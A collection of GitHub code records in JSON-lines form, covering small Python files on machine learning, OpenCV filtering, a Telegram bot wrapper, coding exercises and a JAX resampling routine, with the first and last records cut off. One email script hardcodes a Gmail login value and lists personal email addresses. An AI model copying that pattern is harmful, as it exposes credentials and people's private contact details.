tf.train.GradientDescentOptimizer(lr).minimize(cost)\r\n self.predict_op = Y_hat\r\n \r\n # start the session and initialize params\r\n init = tf.global_variables_initializer()\r\n self.session = tf.InteractiveSession()\r\n self.session.run(init)\r\n\r\n #One step gradient descent what we want in RL \r\n def partial_fit(self, X, Y):\r\n self.session.run(self.train_op, feed_dict={self.X: X, self.Y: Y})\r\n\r\n def predict(self, X):\r\n return self.session.run(self.predict_op, feed_dict={self.X: X})\r\n\r\n\r\nif __name__ == '__main__':\r\n Q_learning_RBF.SGDRegressor = SGDRegressor\r\n Q_learning_RBF.main()","repo_name":"PeterKaras/Reinforcement-Learning","sub_path":"rl2/SGD_withTensorflow.py","file_name":"SGD_withTensorflow.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38899926661","text":"import random\n\ndef throw_dice(player,enemy):\n while True:\n enemy_throw = random.randrange(1,6)\n enemy_throw2 = random.randrange(1,6)\n enemy_total = enemy_throw + enemy_throw2\n print(enemy.name + \" wyrzucił \" + str(enemy_total) + \" z kośćmi \" + str(enemy_throw) + \" i \" + str(enemy_throw2))\n command = input(\"# Rzuć albo pas \")\n if command.lower() == \"pas\":\n return 0\n if command.lower() == \"rzuć\":\n player_throw = random.randrange(1,6)\n player_throw2 = random.randrange(1,6)\n player_total = player_throw + player_throw2\n print(player.name + \" wyrzucił \" + str(player_total) + \" z kośćmi \" + str(player_throw) + \" i \" + str(player_throw2))\n if player_total > enemy_total:\n return 1\n if player_total < enemy_total:\n return 0\n else:\n print(\"REMIS! Powtórka:\\n\")\n","repo_name":"AlexKwiatek/Samples","sub_path":"STYKS/play_dice.py","file_name":"play_dice.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15783790866","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 24 11:37:53 2020\r\n\r\n@author: Family\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\nimg_ori = cv2.imread('images/bananos.jpg')\r\ncv2.imshow('Img-Ori', img_ori)\r\n\r\n#Kernel's\r\nkernel_3x3 = np.ones((3,3),np.float32)/(3*3)\r\noutput = cv2.filter2D(img_ori,-1,kernel_3x3)\r\n#cv2.imshow('Promedio 3x3',output)\r\n\r\nkernel_5x5 = np.ones((5,5),np.float32)/(5*5)\r\noutput = cv2.filter2D(img_ori,-1,kernel_5x5)\r\n#cv2.imshow('Promedio 5x5',output)\r\n\r\nkernel_31x31 = np.ones((31,31),np.float32)/(31*31)\r\noutput = cv2.filter2D(img_ori,-1,kernel_31x31)\r\n#cv2.imshow('Promedio 31x31',output)\r\n\r\n#Filtro Gaussiano\r\noutput = cv2.GaussianBlur(img_ori,(3,3),0) #0: Máscara automática.\r\ncv2.imshow('Desv. Gauss 3x3', output)\r\n\r\noutput = cv2.GaussianBlur(img_ori,(11,11),0) #0: Máscara automática.\r\ncv2.imshow('Desv. Gauss 11x11', output)\r\n\r\noutput = cv2.GaussianBlur(img_ori,(21,21),0) #0: Máscara automática.\r\ncv2.imshow('Desv. Gauss 3x3', output)\r\n\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"joanayala/artificial-vision","sub_path":"Scripts_arvis/Filter_kernel.py","file_name":"Filter_kernel.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"37469683163","text":"import torch\nimport torch.nn.functional as F\n\n##############################################\n##############################################\n##############################################\ndef train(model, data, train_idx, optimizer):\n model.train()\n\n optimizer.zero_grad()\n out = model(data.x, data.adj_t)[train_idx]\n loss = F.nll_loss(out, data.y.squeeze(1)[train_idx])\n loss.backward()\n optimizer.step()\n\n return loss.item()\n\n\n@torch.no_grad()\ndef test(model, data, split_idx, evaluator):\n model.eval()\n\n out = model(data.x, data.adj_t)\n y_pred = out.argmax(dim=-1, keepdim=True)\n\n train_acc = evaluator.eval({\n 'y_true': data.y[split_idx['train']],\n 'y_pred': y_pred[split_idx['train']],\n })['acc']\n valid_acc = evaluator.eval({\n 'y_true': data.y[split_idx['valid']],\n 'y_pred': y_pred[split_idx['valid']],\n })['acc']\n test_acc = evaluator.eval({\n 'y_true': data.y[split_idx['test']],\n 'y_pred': y_pred[split_idx['test']],\n })['acc']\n\n return train_acc, valid_acc, test_acc\n\n##############################################\n##############################################\n##############################################\ndef train_partition(model, data, optimizer, part_id, use_cut_edges=False):\n partition = data.parts[part_id]\n train_part = data.train_parts[part_id]\n \n model[part_id].train()\n\n optimizer[part_id].zero_grad()\n if use_cut_edges:\n out = model[part_id](data.x[partition, :], \n data.adj_t_parts[part_id])[train_part]\n loss = F.nll_loss(out, data.y.squeeze(1)[partition][train_part])\n else:\n out = model[part_id](data.x, data.adj_t)[partition][train_part]\n loss = F.nll_loss(out, data.y.squeeze(1)[partition][train_part])\n loss.backward()\n optimizer[part_id].step()\n return loss.item()","repo_name":"CongWeilin/LLCG-OGB-PyTorch","sub_path":"ogbn-products/utils/train_utils.py","file_name":"train_utils.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"304331127","text":"from typing import Tuple\n\nimport pytorch_lightning as pl\nimport torch\nimport torch.nn as nn\nfrom omegaconf import DictConfig\nfrom pytorch_lightning.core import LightningModule\nfrom pytorch_lightning.metrics.functional import accuracy\nfrom torch import optim\nfrom torch.optim.lr_scheduler import StepLR\n\nfrom src.utils import load_class\n\n\nclass Runner(LightningModule):\n def __init__(self, model: nn.Module, config: DictConfig):\n super().__init__()\n self.model = model\n self.hparams.update(config)\n self.config = config\n print(self.hparams)\n\n def forward(self, x):\n return self.model(x)\n\n def configure_optimizers(self):\n args = dict(self.config.optimizer.params)\n args.update({\"params\": self.model.parameters()})\n\n opt = load_class(module=optim, name=self.config.optimizer.type, args=args)\n scheduler = StepLR(optimizer=opt, step_size=10)\n\n return [opt], [scheduler]\n\n def _comm_step(self, x, y):\n y_hat = self(x)\n loss = self.model.loss(y_hat, y)\n\n pred = torch.argmax(y_hat, dim=1)\n acc = accuracy(pred, y)\n\n return y_hat, loss, acc\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n _, loss, acc = self._comm_step(x, y)\n\n self.log(\n \"train_loss\", loss, on_step=True, on_epoch=True, prog_bar=True, logger=True\n )\n self.log(\n \"train_acc\", acc, on_step=True, on_epoch=True, prog_bar=True, logger=True\n )\n\n return loss\n\n def validation_step(self, batch, batch_idx):\n x, y = batch\n _, loss, acc = self._comm_step(x, y)\n self.log(\n \"val_loss\", loss, on_step=True, on_epoch=True, prog_bar=True, logger=True\n )\n self.log(\n \"val_acc\", acc, on_step=True, on_epoch=True, prog_bar=True, logger=True\n )\n\n return {\"val_loss\": loss, \"val_acc\": acc}\n","repo_name":"Ronalmoo/DataScience","sub_path":"mnist-classification/src/runner/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74448713697","text":"import sys\n\nINF = float('inf')\n\n# input functions\ndef read_int():\n return int(sys.stdin.readline())\n\ndef read_ints():\n return list(map(int, sys.stdin.readline().split()))\n\n# output functions\ndef print_yes_no(condition):\n print('YES' if condition else 'NO')\n\ndef is_prime(num):\n if num > 1:\n for i in range(2, int(num/2)+1):\n if (num % i) == 0:\n return False\n else:\n return True\n else:\n return False\n \ndef solve():\n n = read_int()\n m = 4\n\n while True:\n if is_prime(m):\n m += 1\n continue\n else:\n temp = n - m \n if is_prime(temp):\n m += 1\n continue \n else:\n print(\"%d %d\"%(m,temp))\n break \n\n m += 1 \n\nif __name__ == '__main__':\n solve()","repo_name":"m3hrab/cp-gym","sub_path":"codeforces/CF800/DesignTutorial_LearnfromMath.py","file_name":"DesignTutorial_LearnfromMath.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"87952899","text":"from data import ReutersData\nimport os\nfrom classifiar import KNN\nimport article\n\nTRAINING_DATA_PATH = \"data/\"\n\nK = 25\n\n\ndef full_path(base, filename):\n if base[-1] != \"/\":\n base += \"/\"\n return base + filename\n\n\nclass Model:\n def __init__(self, path):\n training_data_files = []\n for root, _, files in os.walk(TRAINING_DATA_PATH):\n for name in files:\n training_data_files.append(os.path.join(root, name))\n\n training_data = ReutersData(training_data_files)\n\n self.classifiar = KNN(K)\n self.classifiar.fit(training_data.get_data())\n\n def predict(self, testing_data_path):\n testing_data_files = []\n for root, _, files in os.walk(testing_data_path):\n for name in files:\n testing_data_files.append(os.path.join(root, name))\n\n testing_data = ReutersData(testing_data_files).get_data()\n\n predictions = []\n ground_truth = []\n for ar in testing_data:\n ground_truth.append(ar.tags)\n predictions.append(tuple(self.classifiar.predict(ar)))\n print({\"true\": ar.tags, \"predicted\": predictions[-1]})\n\n return tuple(predictions)\n","repo_name":"snirlugassy/workshop_challenge","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10761945622","text":"import tensorflow as tf\n\n# Thanks, https://github.com/tensorflow/tensorflow/issues/4079\ndef LeakyReLU(x, leak=0.1, name=\"lrelu\"):\n with tf.variable_scope(name):\n f1 = 0.5 * (1.0 + leak) \n f2 = 0.5 * (1.0 - leak)\n return f1 * x + f2 * abs(x)\n\n\n","repo_name":"stanford-iprl-lab/sceneflownet","sub_path":"segNet2/models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"34"} +{"seq_id":"18548677774","text":"r\"\"\"\nModule with the basic classes defining transformation models\n\"\"\"\n\nimport numpy\nfrom ..util import vectorized_dot_product\n\n__all__ = ['Model']\n\nclass Model(object):\n r\"\"\"Base Class for Transformations\n\n A transformation is defined as a map:\n\n .. math::\n \\phi: \\Omega \\mapsto \\Omega\n\n\n where :math:`\\Omega \\subseteq \\Re^N` and the\n transform has a parameter vector :math:`\\theta \\in \\Re^M`\n with :math:`M` the number of parameters\n\n Notes\n ----------\n We define :math:`\\phi(x; \\theta) = (\\phi_1(x;\\theta),\\ldots, \\phi_N(x;\\theta))`, then\n the jacobian of the transform with respect to the parameter :math:`\\theta` as\n\n .. math::\n [D_\\theta\\phi(x; \\theta)]_{ij} = \\frac{\\partial \\phi_i(x; \\theta)}{\\partial \\theta_j},\n i=1\\ldots N, j=1\\ldots M\n\n and the jacobian of the transform with respect to the location :math:`x` as\n\n .. math::\n [D_x\\phi(x; \\theta)]_{ij} = \\frac{\\partial \\phi_i(x; \\theta)}{\\partial x_j},\n i, j =1\\ldots N\n\n\n attributes\n ----------\n `parameter` : array-like, shape (n_parameters)\n Stores the parameter vector :math:`\\theta` of the transform.\n\n `identity` : array-like, shape (n_parameters)\n Stores the parameter value :math:`\\theta_0` such that :math:`\\phi(x; \\theta_0) = x`.\n\n `bounds` : array-like, shape (n_parameters, 2)\n Stores the upper and lower bounds for each component of the parameter vectors\n :math:`\\theta` such that :math:`\\text{bounds}_{i0} \\leq \\theta_i \\leq \\text{bounds}_{i1}`\n\n\n References\n ----------\n \"\"\"\n\n def __init__(self):\n self.parameter = self.identity\n\n @property\n def identity(self):\n r\"\"\"\n Stores the parameter value :math:`\\theta_0` such that :math:`\\phi(x; \\theta_0) = x`.\n \"\"\"\n return None\n\n def transform_points(self, points):\n r\"\"\"Transform a set of points.\n\n\n Parameters\n ----------\n x : array-like, shape (n_points, n_dimensions)\n Points to be transformed\n\n\n Returns\n -------\n y : array-like, shape (n_points, n_dimensions)\n :math:`y = \\phi(x)`\n\n \"\"\"\n raise NotImplementedError()\n\n def transform_vectors(self, points, vectors):\n r\"\"\"Transform a set of vectors located in space.\n\n\n Parameters\n ----------\n x : array-like, shape (n_points, n_dimensions)\n Location of the vectors to be transformed\n\n v : array-like, shape (n_points, n_dimensions)\n Vectors to be transformed\n\n Returns\n -------\n w : array-like, shape (n_points, n_dimensions)\n :math:`w = D_x^T\\phi(x) \\cdot w`\n\n where :math:`D_x\\phi(x)` is the Jacobian of :math:`\\phi(x)`\n with respect to the spatial position :math:`x`\n \"\"\"\n\n jacobians = self.jacobian_position(points)\n res = vectorized_dot_product(jacobians, vectors[..., None])[..., 0]\n return numpy.atleast_2d(res)\n\n def transform_tensors(self, points, tensors):\n r\"\"\"Transform a set of tensors located in space.\n\n\n Parameters\n ----------\n x : array-like, shape (n_points, n_dimensions)\n Location of the vectors to be transformed\n\n T : array-like, shape (n_points, n_dimensions, n_dimensions)\n Tensors to be transformed\n\n Returns\n -------\n S : array-like, shape (n_points, n_dimensions)\n :math:`S = D^T_x\\phi(x) \\cdot T \\cdot D_x\\phi(x)`\n\n where :math:`D_x\\phi(x)` is the Jacobian of :math:`\\phi(x)`\n with respect to the spatial position :math:`x`\n \"\"\"\n jacobians = self.jacobian_position(points)\n return vectorized_dot_product(\n vectorized_dot_product(jacobians.swapaxes(-1, -2), tensors),\n jacobians\n )\n\n def jacobian(self, points):\n r\"\"\"Transposed Jacobian of the transform with respect to its parameters\n\n\n Parameters\n ----------\n x : array-like, shape (n_points, n_dimensions)\n Location of the Jacobian to be calculated\n\n Returns\n -------\n J : array-like, shape (n_points, n_parameters, n_dimensions)\n :math:`J = D^T_\\theta\\phi(x)`\n \"\"\"\n\n raise NotImplementedError()\n\n def jacobian_position(self, points):\n r\"\"\"Transposed Jacobian of the transform with respect to its location\n\n\n Parameters\n ----------\n x : array-like, shape (n_points, n_dimensions)\n Location of the Jacobian to be calculated\n\n Returns\n -------\n J : array-like, shape (n_points, n_dimensions, n_dimensions)\n :math:`J = D^T_x\\phi(x)`\n \"\"\"\n\n raise NotImplementedError()\n\n def jacobian_parameter_jacobian_position(self, points):\n r\"\"\"Iterated Transposed Jacobian of the transform with respect to\n its parameter and Location\n\n\n Parameters\n ----------\n x : array-like, shape (n_points, n_dimensions)\n Location of the Jacobian to be calculated\n\n Returns\n -------\n J : array-like, shape (n_points, n_parameters, n_dimensions, n_dimensions)\n :math:`J_{ijk} = \\frac{\\partial \\phi_k(x)}{\\partial \\theta_i \\partial x_j}`\n \"\"\"\n raise NotImplementedError()\n\n def jacobian_vector_matrices(self, points, vectors):\n r\"\"\"Transposed Jacobian with respect to the transform parameter\n of the expression :math:`D^T_x \\phi(x) \\cdot v`\n\n\n Parameters\n ----------\n x : array-like, shape (n_points, n_dimensions)\n Location of the Jacobian to be calculated\n\n v : array-like, shape (n_points, n_dimensions)\n Vectors at each point of x\n\n\n Returns\n -------\n J : array-like, shape (n_points, n_parameters, n_dimensions, n_dimensions)\n :math:`J = D^T_\\theta[D^T_x\\phi(x) \\cdot v]`\n \"\"\"\n jacobian_parameter_jacobian_position = self.jacobian_parameter_jacobian_position(points)\n\n DjacT_vector = vectorized_dot_product(\n jacobian_parameter_jacobian_position, # .swapaxes(-1, -2),\n vectors[:, None, :, None]\n )[:, :, :, 0]\n\n return DjacT_vector\n\n def jacobian_tensor_matrices(self, points, tensors):\n r\"\"\"Transposed Jacobian with respect to the transform parameter\n of the expression :math:`D_x^T \\phi(x) \\cdot T \\cdot D_x\\phi(x)`\n\n\n Parameters\n ----------\n x : array-like, shape (n_points, n_dimensions)\n Location of the Jacobian to be calculated\n\n T : array-like, shape (n_points, n_dimensions, n_dimensions)\n Tensors at each point of x\n\n\n Returns\n -------\n J : array-like, shape (n_points, n_parameters, n_dimensions, n_dimensions)\n :math:`J = D^T_\\theta[D^T_x\\phi(x) \\cdot T\\cdot D_x\\phi(x)]`\n \"\"\"\n jacobians = self.jacobian_position(points)\n jacobian_parameter_jacobian_position = self.jacobian_parameter_jacobian_position(points)\n\n tensor_jac = vectorized_dot_product(tensors, jacobians)\n DjacT_tensor_jac = vectorized_dot_product(\n jacobian_parameter_jacobian_position.swapaxes(-1, -2),\n tensor_jac[:, None, :, :]\n )\n\n return DjacT_tensor_jac + DjacT_tensor_jac.swapaxes(-1, -2)\n\n def norm(self, points):\n raise NotImplementedError()\n\n @property\n def bounds(self):\n r\"\"\"\n Stores the upper and lower bounds for each component of the parameter vectors\n :math:`\\theta` such that :math:`\\text{bounds}_{i0} \\leq \\theta_i \\leq \\text{bounds}_{i1}`\n \"\"\"\n return None\n","repo_name":"demianw/pyMedImReg-public","sub_path":"registration/model/basis.py","file_name":"basis.py","file_ext":"py","file_size_in_byte":7706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"25824939473","text":"import collections.abc\nimport logging\nfrom typing import Iterable, Union\n\nimport aiogram # type: ignore\n\nfrom . import types, share, exceptions\n\nResponseType = Union[types.Response, Iterable[types.Response]]\n\n\nclass BotWrapper:\n def __init__(self, bot: aiogram.Bot, share_: share.Share):\n self._bot = bot\n self._share = share_\n\n async def _send_one(self, chat_id: int, resp: types.Response):\n photo_bytes = None\n if resp.photo_path:\n try:\n photo_bytes = self._share.get_file(resp.photo_path)\n except exceptions.ResourceNotFound:\n logging.error(\n 'Resource not found: %s, falling back to plain text',\n resp.photo_path,\n )\n\n if photo_bytes:\n await self._bot.send_photo(\n chat_id, photo_bytes, resp.text, resp.parse_mode,\n )\n else:\n await self._bot.send_message(chat_id, resp.text, resp.parse_mode)\n\n async def send(self, chat_id: int, response: ResponseType):\n if isinstance(response, collections.abc.Iterable):\n for msg in response:\n await self._send_one(chat_id, msg)\n else:\n await self._send_one(chat_id, response)\n\n async def reply(self, message: aiogram.types.Message, resp: ResponseType):\n await self.send(message.chat.id, resp)\n","repo_name":"maxkimlyk/birthdays-lord-bot","sub_path":"bot/bot_wrapper.py","file_name":"bot_wrapper.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7025748174","text":"import numpy as np\n\n\ndef num_correct(w, b):\n count = 0\n for m in data:\n xm = m[0:4]\n y = m[4]\n count += 1 if y * (np.dot(w, xm) + b) > 0 else 0\n return count\n\n\ndef standard_gradient_descent(w, b, gamma):\n for t in range(0, 10000000):\n deltaw = 0\n deltab = 0\n correct = 0\n for m in data:\n xm = m[0:4]\n y = m[4]\n discriminator = (1 - y * (np.dot(w, xm) + b))\n gradw = 2 * y * xm * discriminator\n gradb = 2 * y * discriminator\n deltaw += gradw if discriminator >= 0 else 0\n deltab += gradb if discriminator >= 0 else 0\n correct += 1 if y * (np.dot(w, xm) + b) > 0 else 0\n w = w + deltaw*gamma/data.shape[0]\n b = b + deltab*gamma/data.shape[0]\n if correct == data.shape[0]:\n return [w, b]\n\n\ndef stochastic_gradient_descent(w, b, gamma):\n for t in range(0, 10000000):\n deltaw = 0\n deltab = 0\n k = data[t % data.shape[0]]\n xk = k[0:4]\n y = k[4]\n discriminator = (1 - y * (np.dot(w, xk) + b))\n gradw = 2 * y * xk * discriminator\n gradb = 2 * y * discriminator\n deltaw += gradw if discriminator >= 0 else 0\n deltab += gradb if discriminator >= 0 else 0\n\n w = w + deltaw*gamma/data.shape[0]\n b = b + deltab*gamma/data.shape[0]\n if t % data.shape[0] == 0:\n correct = num_correct(w, b)\n if correct == data.shape[0]:\n return [t, w, b]\n\n\ndata = np.loadtxt(\"perceptron.data\", delimiter=\",\")\n# standard_parameters = standard_gradient_descent(w=np.array([0, 0, 0, 0]), b=0, gamma=1)\nstochastic_parameters = stochastic_gradient_descent(w=np.array([0, 0, 0, 0]), b=0, gamma=1)\nprint(stochastic_parameters)\n\n","repo_name":"austin5627/Machine-Learning-HW","sub_path":"HW1/Problem1.py","file_name":"Problem1.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30339717116","text":"import unittest\n\n\ndef get_permutations(string):\n if len(string) == 0 or len(string) == 1:\n return set([string])\n\n char = string[-1]\n sub_str = string[:-1]\n sub_perms = get_permutations(sub_str)\n\n perms = []\n for perm in sub_perms:\n for i in range(len(perm)+1):\n perms.append(perm[:i] + char + perm[i:])\n\n return set(perms)\n\n\n# Tests\n\nclass Test(unittest.TestCase):\n\n def test_empty_string(self):\n actual = get_permutations('')\n expected = set([''])\n self.assertEqual(actual, expected)\n\n def test_one_character_string(self):\n actual = get_permutations('a')\n expected = set(['a'])\n self.assertEqual(actual, expected)\n\n def test_two_character_string(self):\n actual = get_permutations('ab')\n expected = set(['ab', 'ba'])\n self.assertEqual(actual, expected)\n\n def test_three_character_string(self):\n actual = get_permutations('abc')\n expected = set(['abc', 'acb', 'bac', 'bca', 'cab', 'cba'])\n self.assertEqual(actual, expected)\n\n\nunittest.main(verbosity=2)\n","repo_name":"dm36/interview-practice","sub_path":"interview_cake_daily_practice/perms.py","file_name":"perms.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"2992308370","text":"\nimport smtplib as s\nob=s.SMTP(\"smtp.gmail.com\",587)\n\nob.starttls()\n\nob.login(\"nsinghboss02@gmail.com\",9795357222)\n\nsubject=\"sending email using python\"\nbody=\"the easiest way to send emails\"\n\nmessage=\"subject:{}\\n\\n{}\".format(subject,body)\nlistOfAddress=[\"singhalokkumar427@gmail.com\",\"nitishtiwari1710@gmail.com\",\"nitin.singh_cs20@gla.ac.in\"]\nob.sendmail(\"nsinghboss02@gmail.com\",listOfAddress,message)\nprint(\"sent successfully.....\")\nob.quit()\n","repo_name":"being-nitin/sending-email-using-python","sub_path":"mailserver.py","file_name":"mailserver.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"10378652814","text":"# Análise de dados em uma Tupla #\r\nn1 = int(input('Digite um número: '))\r\nn2 = int(input('Digite mais um número: '))\r\nn3 = int(input('Digite outro número: '))\r\nn4 = int(input('Digite um ultimo número: '))\r\n\r\nnum = (n1, n2, n3, n4)\r\n\r\n\r\nprint(f'Você digitou esses valores: {num}')\r\nprint(f'O valor 9 apareceu {num.count(9)} vezes.')\r\nif 3 in num:\r\n print(\r\n f'O valor 3 apareceu pela primeira vez na {num.index(3)+1}ª posição.')\r\nelse:\r\n print('O valor 3 não apareceu na tupla')\r\nprint(f'Os valores pares digitados foram: ', end=' ')\r\nfor par in num:\r\n if par % 2 == 0:\r\n print(par, end=' ')\r\n","repo_name":"BrunoMorastoni/DesafiosCursoEmVideo-PyMundo03","sub_path":"Desafios/Desafio 75.py","file_name":"Desafio 75.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39387895351","text":"#Write a Python function called find_longest_palindrome that takes a string as input and returns the longest palindromic substring in the string.\n\n#A palindromic string is a string that is spelled the same forwards and backwards, e.g. \"racecar\". A substring is a contiguous sequence of characters within a string.\n\n\nfrom typing import List\n\ndef find_longest_palindrome(string):\n # Edge case: empty input\n if not string:\n return \"\"\n\n # Initialize the longest palindrome to the first character\n longest_palindrome = string[0]\n\n # Iterate through each character in the string\n for i in range(len(string)):\n # Check for palindromes of odd length centered at this character\n palindrome = find_palindrome(string, i, i)\n if len(palindrome) > len(longest_palindrome):\n longest_palindrome = palindrome\n\n # Check for palindromes of even length centered at this character\n palindrome = find_palindrome(string, i, i+1)\n if len(palindrome) > len(longest_palindrome):\n longest_palindrome = palindrome\n\n return longest_palindrome\n\ndef find_palindrome(string, left, right):\n # Continue expanding the palindrome as long as the left and right indices are valid\n # and the characters at those indices are the same\n while left >= 0 and right < len(string) and string[left] == string[right]:\n left -= 1\n right += 1\n\n # Return the palindrome, excluding the characters that caused the loop to exit\n return string[left+1:right]\n\n\ns = \"banana\"\n\nprint (find_longest_palindrome(s) )","repo_name":"IchibanKanobee/MyExperimentalProjects","sub_path":"Interview/Python/leetcode/find_longest_palindrom.py","file_name":"find_longest_palindrom.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5593936365","text":"import torch\nfrom visdom import Visdom\n\n\nclass My_Visdom():\n def __init__(self, port, env_name = 'main', ):\n super(My_Visdom, self).__init__()\n self.visdom = Visdom(port = port)\n self.record_Y = {}\n self.record_X = {}\n self.env_name = env_name\n\n def plot_record(self, Y_value, win_name, X_value = None):\n if (isinstance(Y_value, torch.Tensor)):\n Y_value = Y_value.item()\n assert isinstance(Y_value, int) or isinstance(Y_value, float)\n if (win_name not in self.record_Y):\n self.record_Y[win_name] = []\n self.record_X[win_name] = []\n self.record_Y[win_name].append(Y_value)\n if (X_value is None):\n if (len(self.record_X[win_name]) == 0):\n self.record_X[win_name].append(1)\n else:\n self.record_X[win_name].append(self.record_X[win_name][-1] + 1)\n else:\n self.record_X[win_name].append(X_value)\n self.visdom.line(Y = self.record_Y[win_name], X = self.record_X[win_name], win = win_name,\n opts = dict(title = win_name), env = self.env_name)\n\n def text(self, text, win_name, append):\n if (append):\n if (self.visdom.win_exists(win = win_name, env = self.env_name)):\n self.visdom.text(text = text, win = win_name, append = True, env = self.env_name,\n opts = dict(title = win_name))\n else:\n self.visdom.text(text = text, win = win_name, append = False, env = self.env_name,\n opts = dict(title = win_name))\n else:\n self.visdom.text(text = text, win = win_name, append = False, opts = dict(title = win_name),\n env = self.env_name)\n\n def table(self, tbl, win_name):\n tbl_str = \" \"\n tbl_str += \" \\\n \\\n \\\n \"\n for k, v in tbl.items():\n tbl_str += \" \\\n \\\n \\\n \" % (k, v)\n\n tbl_str += \"
    TermValue
    %s%s
    \"\n default_opts = {'title': win_name}\n self.visdom.text(text = tbl_str, win = win_name, append = False, env = self.env_name, opts = default_opts)\n\n def clear_record(self, win_name):\n if (win_name in self.record_Y):\n self.record_Y[win_name] = []\n self.record_X[win_name] = []\n else:\n raise Exception('win name not in env')\n\n def close_all_curves(self):\n self.visdom.close(win = None, env = self.env_name)\n\n\nif __name__ == '__main__':\n visdom = My_Visdom(env_name = 'main', port = 8888)\n visdom.plot_record(Y_value = 1, win_name = 'hello', X_value = 1)\n visdom.plot_record(Y_value = 10, win_name = 'hello', X_value = 2)\n\n # import time\n # time.sleep(0.1)™\n # visdom.close_all_curves()\n visdom.text('hello, world,123', 'text 123', True)\n # visdom.text('hello, world,234', 'text 123', True)\n","repo_name":"zhanglu-cst/ClassKG","sub_path":"compent/visdom_show.py","file_name":"visdom_show.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"34"} +{"seq_id":"18646168837","text":"name = \"Roshan\"\r\nage = 22\r\nprint(\"Hello \" + name + \" Your age is \" + str(age) ) #ugly syntax\r\n\r\n#String formatting\r\n#1.using placeholder {} ----(python 3)\r\n\r\nprint(\"Hello {} your age is {}\".format(name , age+3))\r\n\r\n#2.using ----> Python 3.6\r\n\r\nprint(f\"Hello {name} your age is {age+2}\") #string formatting\r\n\r\n#average of 3 numbers\r\na ,b , c = input(\"Enter 3 numbers seprated by commas\").split(\",\")\r\n# a,b,c = int(input(\"Enter 3 numbers seprated by commas\").split(\",\"))# type error\r\n#we can't use\r\na = int(a)\r\nb = int(b)\r\nc = int(c)\r\nprint(f\"The avg is {(a+b+c)/3}\")","repo_name":"rksharma333/pythonRepo","sub_path":"pythonHarshitVasistha/Chapter 2 All about String/4 string formatting.py","file_name":"4 string formatting.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26946809357","text":"import jax\nimport jax.numpy as np\nimport ipdb\n\nfrom functools import partial\n\nfrom equinox import filter_jit\n\n\n# filter_jit from equinox is really cool. it will treat jax arrays dynamically (so jit\n# only re-runs when they have new shape), whereas other types (ints, bools, strings, ...)\n# will trigger re-jitting when changed, as if they were marked as static_argnums/names in\n# jax.jit.\n\n# this allows us to have jax arrays in algo_params without too much hassle.\n\n@filter_jit\ndef resample(ys, t, nn_apply_fct, nn_params, algo_params, key):\n\n # all the ys that have left the interesting region, we want to put back into it.\n\n # this is the first mockup of the 'actual' resampling function.\n # It will not only put points in new locations, but also put in the correct value\n # and costate information, based on the value function approximation given by\n # (nn_apply_fct, nn_params). nn_apply_fct should be the apply function of the nn\n # object itself, NOT the wrapper which is mostly used here. This is to separate\n # NN architecture info (-> in nn object) from the parameters nn_params, which\n # otherwise would have been in the same nn_wrapper object, perventing jit.\n\n # variable naming scheme:\n # old : before resampling, whatever came out of the last pontryagin integration step\n # resampled: ALL resampled variables, whether we want them or not\n # new : resampled where we want to resample, old where we don't\n\n\n # does this work with jit? -> yes, apparently\n nx = (ys.shape[1] - 1) // 2\n\n old_xs = ys[:, 0:nx]\n old_V_grads = ys[:, nx:2*nx]\n old_Vs = ys[:, -1]\n\n\n # depending on the resampling condition, set the resampling mask to 1 for the trajectories\n # we want to resample.\n if algo_params['resample_type'] == 'minimal':\n\n # x domain is parameterised as ellipse: X = {x in R^n: x.T @ Q_x @ x <= 1}\n ellipse_membership_fct = lambda x: x.T @ algo_params['x_domain'] @ x - 1\n ellipse_memberships = jax.vmap(ellipse_membership_fct)(old_xs)\n\n resample_mask = (ellipse_memberships > 0).astype(np.float32)\n\n elif algo_params['resample_type'] == 'all':\n\n resample_mask = np.ones((algo_params['n_trajectories']))\n\n else:\n 